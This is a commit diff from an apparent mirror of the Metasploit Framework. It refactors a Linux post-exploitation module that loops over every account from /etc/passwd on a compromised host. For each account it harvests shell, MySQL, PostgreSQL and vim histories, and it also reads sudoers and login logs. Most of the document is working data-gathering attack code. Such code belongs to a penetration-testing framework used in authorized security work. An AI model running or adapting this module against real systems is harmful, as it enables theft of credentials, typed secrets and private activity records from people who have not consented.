infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Use a list of users

bug/bundler_fix
Brendan Coles 2014-12-31 08:12:16 +11:00
parent 897e993971
commit d2e6f90569
1 changed files with 31 additions and 68 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

99
modules/post/linux/gather/enum_users_history.rb
View File

@ -37,20 +37,23 @@ class Metasploit3 < Msf::Post
print_good("\t#{distro[:version]}") print_good("\t#{distro[:version]}")
print_good("\t#{distro[:kernel]}") print_good("\t#{distro[:kernel]}")
users = execute('/bin/cat /etc/passwd | cut -d : -f 1')
user = execute('/usr/bin/whoami') user = execute('/usr/bin/whoami')
users = execute('/bin/cat /etc/passwd | cut -d : -f 1').chomp.split
users = [user] if user != 'root' || users.blank?
mount = execute('/bin/mount -l') vprint_status("Retrieving history for #{users.length} users")
shells = %w{ ash bash csh ksh sh tcsh zsh } shells = %w{ ash bash csh ksh sh tcsh zsh }
shells.each do |shell| users.each do |u|
get_shell_history(users, user, shell) shells.each do |shell|
get_shell_history(u, shell)
end
get_mysql_history(u)
get_psql_history(u)
get_vim_history(u)
end end
get_mysql_history(users, user)
get_psql_history(users, user)
get_vim_history(users, user)
last = execute('/usr/bin/last && /usr/bin/lastlog') last = execute('/usr/bin/last && /usr/bin/lastlog')
sudoers = cat_file('/etc/sudoers') sudoers = cat_file('/etc/sudoers')
save('Last logs', last) unless last.blank? save('Last logs', last) unless last.blank?
save('Sudoers', sudoers) unless sudoers.blank? || sudoers =~ /Permission denied/ save('Sudoers', sudoers) unless sudoers.blank? || sudoers =~ /Permission denied/
end end
@ -84,84 +87,44 @@ class Metasploit3 < Msf::Post
output output
end end
def get_shell_history(users, user, shell) def get_shell_history(user, shell)
return if shell.nil? return if shell.nil?
if user == 'root' && !users.nil? vprint_status("Extracting #{shell} history for #{user}")
users = users.chomp.split if user == 'root'
users.each do |u| hist = cat_file("/root/.#{shell}_history")
vprint_status("Extracting #{shell} history for #{u}")
if u == 'root'
hist = cat_file("/root/.#{shell}_history")
else
hist = cat_file("/home/#{u}/.#{shell}_history")
end
save("#{shell} History for #{u}", hist) unless hist.blank? || hist =~ /No such file or directory/
end
else else
vprint_status("Extracting #{shell} history for #{user}")
hist = cat_file("/home/#{user}/.#{shell}_history") hist = cat_file("/home/#{user}/.#{shell}_history")
vprint_status(hist)
save("#{shell} History for #{user}", hist) unless hist.blank? || hist =~ /No such file or directory/
end end
save("#{shell} History for #{user}", hist) unless hist.blank? || hist =~ /No such file or directory/
end end
def get_mysql_history(users, user) def get_mysql_history(user)
if user == 'root' && !users.nil? vprint_status("Extracting MySQL history for #{user}")
users = users.chomp.split if user == 'root'
users.each do |u| sql_hist = cat_file('/root/.mysql_history')
vprint_status("Extracting MySQL history for #{u}")
if u == 'root'
sql_hist = cat_file('/root/.mysql_history')
else
sql_hist = cat_file("/home/#{u}/.mysql_history")
end
save("MySQL History for #{u}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
end
else else
vprint_status("Extracting MySQL history for #{user}")
sql_hist = cat_file("/home/#{user}/.mysql_history") sql_hist = cat_file("/home/#{user}/.mysql_history")
vprint_status(sql_hist) if sql_hist
save("MySQL History for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
end end
save("MySQL History for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
end end
def get_psql_history(users, user) def get_psql_history(user)
if user == 'root' && !users.nil? vprint_status("Extracting PostgreSQL history for #{user}")
users = users.chomp.split if user == 'root'
users.each do |u| sql_hist = cat_file('/root/.psql_history')
vprint_status("Extracting PostgreSQL history for #{u}")
if u == 'root'
sql_hist = cat_file('/root/.psql_history')
else
sql_hist = cat_file("/home/#{u}/.psql_history")
end
save("PostgreSQL History for #{u}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
end
else else
vprint_status("Extracting PostgreSQL history for #{user}")
sql_hist = cat_file("/home/#{user}/.psql_history") sql_hist = cat_file("/home/#{user}/.psql_history")
vprint_status(sql_hist) if sql_hist
save("PostgreSQL History for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
end end
save("PostgreSQL History for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
end end
def get_vim_history(users, user) def get_vim_history(user)
if user == 'root' && !users.nil? vprint_status("Extracting VIM history for #{user}")
users = users.chomp.split if user == 'root'
users.each do |u| vim_hist = cat_file('/root/.viminfo')
vprint_status("Extracting VIM history for #{u}")
if u == 'root'
vim_hist = cat_file('/root/.viminfo')
else
vim_hist = cat_file("/home/#{u}/.viminfo")
end
save("VIM History for #{u}", vim_hist) unless vim_hist.blank? || vim_hist =~ /No such file or directory/
end
else else
vprint_status("Extracting VIM history for #{user}")
vim_hist = cat_file("/home/#{user}/.viminfo") vim_hist = cat_file("/home/#{user}/.viminfo")
vprint_status(vim_hist)
save("VIM History for #{user}", vim_hist) unless vim_hist.blank? || vim_hist =~ /No such file or directory/
end end
save("VIM History for #{user}", vim_hist) unless vim_hist.blank? || vim_hist =~ /No such file or directory/
end end
end end